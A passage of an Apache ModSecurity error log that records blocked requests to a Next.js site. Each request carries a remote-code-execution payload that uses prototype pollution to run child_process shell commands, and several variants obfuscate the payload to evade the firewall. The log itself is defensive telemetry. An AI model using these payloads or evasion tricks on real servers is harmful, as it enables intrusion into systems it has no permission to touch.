`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJmy5c83uMXRUE9zvQSxQAAAcc"] [Sun Apr 05 15:42:35.357986 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:41850] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJmy5c83uMXRUE9zvQSxgAAAcY"] [Sun Apr 05 15:42:35.358632 2026] [:error] [pid 1503:tid 1511] [client 172.94.9.253:41860] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJmy0I7AjfUQYCN-J7DiAAAAMI"] [Sun Apr 05 15:42:35.359062 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:41866] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJmy7xQSOrq_iRTM7dpgAAAARI"] [Sun Apr 05 15:42:35.359165 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:41840] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJmy7xQSOrq_iRTM7dpgQAAAQU"] [Sun Apr 05 15:42:35.360501 2026] [:error] [pid 23077:tid 23098] [client 172.94.9.253:41824] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJmy5c83uMXRUE9zvQSyAAAAc8"] [Sun Apr 05 15:42:35.360553 2026] [:error] [pid 23077:tid 23092] [client 172.94.9.253:41880] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJmy5c83uMXRUE9zvQSxwAAAck"] [Sun Apr 05 15:42:35.439297 2026] [:error] [pid 22788:tid 22804] [client 172.94.9.253:41896] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJmyyLbhFL16Wsx-C9DAAAAAY4"] [Sun Apr 05 15:42:35.439361 2026] [:error] [pid 23077:tid 23084] [client 172.94.9.253:41900] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJmy5c83uMXRUE9zvQSywAAAcE"] [Sun Apr 05 15:42:35.439621 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:41958] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJmy7xQSOrq_iRTM7dphQAAAQs"] [Sun Apr 05 15:42:35.441944 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:41898] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJmy7xQSOrq_iRTM7dphgAAAQY"] [Sun Apr 05 15:42:35.454282 2026] [:error] [pid 23077:tid 23086] [client 172.94.9.253:41956] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJmy5c83uMXRUE9zvQSygAAAcM"] [Sun Apr 05 15:42:35.455214 2026] [:error] [pid 23077:tid 23096] [client 172.94.9.253:41938] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJmy5c83uMXRUE9zvQSzQAAAc0"] [Sun Apr 05 15:42:35.455625 2026] [:error] [pid 23077:tid 23105] [client 172.94.9.253:41926] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJmy5c83uMXRUE9zvQSzAAAAdY"] [Sun Apr 05 15:42:35.470783 2026] [:error] [pid 13019:tid 13262] [client 172.94.9.253:41960] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJmy7xQSOrq_iRTM7dpgwAAARY"] [Sun Apr 05 15:42:35.473869 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:41948] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJmy7xQSOrq_iRTM7dpggAAAQM"] [Sun Apr 05 15:42:35.475940 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:41928] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJmy7xQSOrq_iRTM7dphAAAARA"] [Sun Apr 05 15:42:35.524209 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:41968] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJmy7xQSOrq_iRTM7dphwAAAQI"] [Sun Apr 05 15:42:35.525117 2026] [:error] [pid 1503:tid 1517] [client 172.94.9.253:41980] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJmy0I7AjfUQYCN-J7DigAAAMg"] [Sun Apr 05 15:42:35.525335 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:41994] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJmy7xQSOrq_iRTM7dpiAAAAQQ"] [Sun Apr 05 15:42:35.525683 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:41964] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file 